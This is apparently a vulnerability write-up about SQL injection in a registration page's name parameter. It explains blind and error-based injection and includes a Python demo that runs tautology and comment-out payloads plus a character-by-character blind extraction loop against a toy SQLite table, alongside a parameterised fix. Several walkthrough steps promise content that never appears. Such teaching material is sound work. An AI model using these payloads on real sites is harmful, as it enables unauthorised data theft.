This vulnerability can be exploited to execute arbitrary SQL. While testing it, we found that /ucenter/reg.php does not sanitize user input before using it in a database query, so an attacker can inject arbitrary SQL statements against the affected site's database. The following walkthrough shows where the injection happens:

1. Open the application's backend URL in a web browser and submit the following in the request box:

In the backend of the site, you'll find the following registration form:

You can find details about the vulnerability and how to exploit it on the vendor's website here. You can also find the vendor's contact information on their website.

2. Next, follow the user input into the backend to find where it is sent and how it is processed. In the following example, we trace the backend URL that receives the user input and what happens to it there:

3. The backend code does not sanitize the name parameter before concatenating it into an SQL statement. Because the parameter's value becomes part of the query text, an attacker can close the intended string literal and append SQL of their own.
SQL Injection: An Overview
SQL Injection occurs when an attacker can place SQL syntax into an input (a URL parameter, form field or header) that the application concatenates into a database query. The injected text is executed as part of the query, which lets the attacker read or modify data stored in the application's database.
Two common types of SQL Injection are relevant to this write-up: blind and error-based. (The original label "stored" is a misnomer here; stored, or second-order, injection refers to a payload that is saved first and only triggers in a later query.)

Blind SQL injection is when the application returns no information about the statement it executed: no error message and no query output reach the user. The attacker instead infers the result indirectly, from a difference in the page content (boolean-based) or in response time (time-based), recovering roughly one bit per request.

Error-based SQL injection is when the application does return a message about the statement it executed, typically a database error, but the message may not contain enough information on its own to tell you how to exploit the flaw. There are several ways you can use what it does reveal:
- You can leverage a tool or script that automates your testing
- You can work out what type of SQL statement was executed (and which database engine is behind it)
- You can try different kinds of queries to see which ones you can exploit
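The following is an added example, not code from the original write-up or from the affected product. It models the flaw described for the name parameter (user input concatenated into an SQL statement) next to the parameterised fix, and then shows the two situations described above: an error-based case where the database error text reaches the user, and a boolean-based blind case where only a "taken"/"free" answer comes back and a value is still recovered one character at a time. The table, rows, handler names and the assumption that the registration handler's query is a username-availability check are all constructed for the demonstration; SQLite stands in for the real database.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's user table (hypothetical)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def username_taken_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """The flaw: the name parameter is concatenated straight into the SQL text."""
    sql = f"SELECT COUNT(*) FROM users WHERE username = '{name}'"
    return conn.execute(sql).fetchone()[0] > 0


def username_taken_safe(conn: sqlite3.Connection, name: str) -> bool:
    """The fix: the value is bound as a parameter and can never become SQL syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0


def error_visible(conn: sqlite3.Connection, name: str):
    """Error-based case: the handler lets the database error text reach the user.

    Returns the error string, or None when the query ran without error.
    """
    try:
        username_taken_vulnerable(conn, name)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind probe built on the vulnerable check.

    The payload closes the string literal, ORs in a condition of the attacker's
    choosing and comments out the trailing quote the handler appends.  The caller
    learns only "taken" (True) or "free" (False): one bit per request.
    """
    payload = f"x' OR ({condition}) -- "
    return username_taken_vulnerable(conn, payload)


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_secret(conn: sqlite3.Connection, username: str) -> str:
    """Recover another row's secret one character at a time through the oracle."""
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for ch in ALPHABET:
            cond = (
                f"substr((SELECT secret FROM users WHERE username = '{username}'),"
                f" {pos}, 1) = '{ch}'"
            )
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            # no character matched at this position: we have run past the end
            return recovered


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable check fooled:", username_taken_vulnerable(db, tautology))
    print("parameterised check fooled:", username_taken_safe(db, tautology))
    print("error leaked to user:", error_visible(db, "x'"))
    print("blindly recovered admin secret:", extract_secret(db, "admin"))
```

The parameterised version is the only real fix: escaping or "sanitizing" the name with a blocklist leaves the value inside the SQL text, whereas a bound parameter is handed to the engine separately and is never parsed as syntax. The extraction loop is deliberately naive (a linear scan of a small alphabet); a real assessment would use binary search on character codes and a time-based variant when even the boolean difference is suppressed.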
Timeline
Published on: 11/03/2022 17:15:00 UTC
Last modified on: 11/03/2022 19:16:00 UTC